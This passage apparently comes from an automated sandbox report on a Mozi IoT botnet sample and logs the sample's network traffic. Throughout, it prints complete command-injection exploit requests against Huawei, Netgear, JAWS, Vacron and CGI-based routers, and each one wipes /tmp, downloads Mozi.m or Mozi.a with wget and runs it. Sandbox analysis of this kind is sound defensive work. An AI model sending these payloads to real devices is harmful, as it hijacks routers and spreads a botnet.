/tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 42.86.210.103:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 38.133.23.48:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 59.42.48.122:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 138.108.21.90:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: /tmp/Mozi.m.elf (PID: 6230)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6272)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6276)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6268)Socket: 0.0.0.0:41913Jump to behavior
                            Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.23:28674 -> 166.70.184.252:61879
                            Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                            Source: unknownTCP traffic detected without corresponding DNS query: 170.13.70.64
                            Source: unknownTCP traffic detected without corresponding DNS query: 118.114.118.190
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.224.38.249
                            Source: unknownTCP traffic detected without corresponding DNS query: 34.136.79.41
                            Source: unknownTCP traffic detected without corresponding DNS query: 178.51.3.128
                            Source: unknownTCP traffic detected without corresponding DNS query: 202.152.121.18
                            Source: unknownTCP traffic detected without corresponding DNS query: 152.158.234.19
                            Source: unknownTCP traffic detected without corresponding DNS query: 101.108.225.47
                            Source: unknownTCP traffic detected without corresponding DNS query: 182.216.146.147
                            Source: unknownTCP traffic detected without corresponding DNS query: 142.235.63.140
                            Source: unknownTCP traffic detected without corresponding DNS query: 100.184.144.114
                            Source: unknownTCP traffic detected without corresponding DNS query: 113.229.7.213
                            Source: unknownTCP traffic detected without corresponding DNS query: 84.2.80.57
                            Source: unknownTCP traffic detected without corresponding DNS query: 21.244.144.86
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.18.254.161
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.151.164.41
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.116.84.152
                            Source: unknownTCP traffic detected without corresponding DNS query: 162.33.207.205
                            Source: unknownTCP traffic detected without corresponding DNS query: 60.29.245.149
                            Source: unknownTCP traffic detected without corresponding DNS query: 194.213.146.39
                            Source: unknownTCP traffic detected without corresponding DNS query: 28.144.199.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 222.76.197.121
                            Source: unknownTCP traffic detected without corresponding DNS query: 182.98.49.24
                            Source: unknownTCP traffic detected without corresponding DNS query: 42.242.241.33
                            Source: unknownTCP traffic detected without corresponding DNS query: 106.44.250.26
                            Source: unknownTCP traffic detected without corresponding DNS query: 121.136.2.49
                            Source: unknownTCP traffic detected without corresponding DNS query: 124.74.74.114
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.122.193.152
                            Source: unknownTCP traffic detected without corresponding DNS query: 137.151.78.143
                            Source: unknownTCP traffic detected without corresponding DNS query: 136.34.183.2
                            Source: unknownTCP traffic detected without corresponding DNS query: 85.78.252.113
                            Source: unknownTCP traffic detected without corresponding DNS query: 26.83.38.216
                            Source: unknownTCP traffic detected without corresponding DNS query: 35.36.155.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 118.35.168.154
                            Source: unknownTCP traffic detected without corresponding DNS query: 163.152.100.25
                            Source: unknownTCP traffic detected without corresponding DNS query: 134.32.128.235
                            Source: unknownTCP traffic detected without corresponding DNS query: 125.133.16.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 123.244.144.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 161.185.149.32
                            Source: unknownTCP traffic detected without corresponding DNS query: 158.219.39.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.244.147.234
                            Source: unknownTCP traffic detected without corresponding DNS query: 71.44.225.112
                            Source: unknownTCP traffic detected without corresponding DNS query: 79.39.229.25
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.20.181.48
                            Source: unknownTCP traffic detected without corresponding DNS query: 61.237.100.81
                            Source: unknownTCP traffic detected without corresponding DNS query: 48.214.85.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 161.199.124.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 190.249.69.106
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 137.151.78.143:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 193.94.36.43:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.140.14.6:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.173.246.164:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
